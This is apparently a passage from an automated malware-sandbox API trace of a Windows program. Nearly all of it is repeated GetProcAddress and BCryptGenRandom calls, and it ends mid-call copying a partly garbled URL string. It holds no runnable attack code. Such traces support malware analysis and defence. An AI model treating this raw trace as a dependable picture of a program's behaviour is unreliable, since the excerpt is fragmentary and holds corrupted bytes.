0x7ffc5bcc36b0 [0269.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.064] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.064] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.065] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.065] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02ba0, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a02ba0) returned 0x0 [0269.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.066] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.066] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.067] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.067] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.068] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.068] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.069] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.070] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.070] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.071] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.071] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.072] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.072] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02bc8, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x3a02bc8) returned 0x0 [0269.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.073] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.073] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.074] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.074] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.075] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.075] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.076] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.076] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0269.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02bed, cbBuffer=0x20, dwFlags=0x2 | out: pbBuffer=0x3a02bed) returned 0x0 [0269.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0269.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0269.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0269.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0269.236] GetProcessHeap () returned 0x440000 [0269.236] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473770 [0269.236] lstrcpyA (in: lpString1=0x473770, lpString2="þ]¡´s://www.yahoo.com" | out: 